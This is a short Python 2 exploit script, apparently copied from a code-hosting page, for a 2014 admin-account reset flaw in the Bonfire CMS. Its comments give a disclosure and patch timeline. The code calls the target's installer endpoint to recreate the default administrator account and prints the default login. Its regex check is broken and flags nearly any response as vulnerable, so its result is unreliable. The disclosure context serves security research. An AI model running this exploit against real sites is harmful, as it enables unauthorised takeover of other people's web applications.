40 lines
No EOL
1.3 KiB
Python
Executable file
40 lines
No EOL
1.3 KiB
Python
Executable file
#!/usr/bin/env python
|
||
# coding: utf-8
|
||
#
|
||
# Bonefire v.0.7.1 Reinstall Admin Account Exploit
|
||
#
|
||
# Author : Mehmet INCE
|
||
#
|
||
# Analysis write-up : http://www.mehmetince.net/ci-bonefire-reinstall-admin-account-vulnerability-analysis-exploit/
|
||
#
|
||
# Description :
|
||
# Forgotten controls lead to call install module which lead to
|
||
# create default administrator account again!
|
||
#
|
||
# TIMELINE
|
||
# 21 Apr 2014 14:00 –Vulnerability found
|
||
# 23 Apr 2014 21:20 – Analysis and write-up completed
|
||
# 23 Apr 2014 21:29 – First contact with lead developer of Bonfire
|
||
# 23 Apr 2014 21:33 – Response from lead developer
|
||
# 23 Apr 2014 21:52 – Vulnerability confirmed by lead developer
|
||
# 23 Apr 2014 21:55 – Vulnerability has been patched via following commit
|
||
# https://github.com/ci-bonfire/Bonfire/commit/9cb76c66babf89952c3d48279b026c59e198f46e
|
||
|
||
import urllib2
|
||
import sys
|
||
import re
|
||
target = sys.argv[1]
|
||
path = sys.argv[2]
|
||
|
||
if len(sys.argv) > 3:
|
||
print "Usage : python bonfire www.target.com /path/"
|
||
exit(0)
|
||
|
||
content = urllib2.urlopen(target+path+"index.php/install/do_install").read()
|
||
|
||
if re.search('[admin@mybonefire.com]', content):
|
||
print "Target is vulnerable!"
|
||
print "Username : admin@mybonefire.com"
|
||
print "Password : password"
|
||
else:
|
||
print "Target is not vulnerable..." |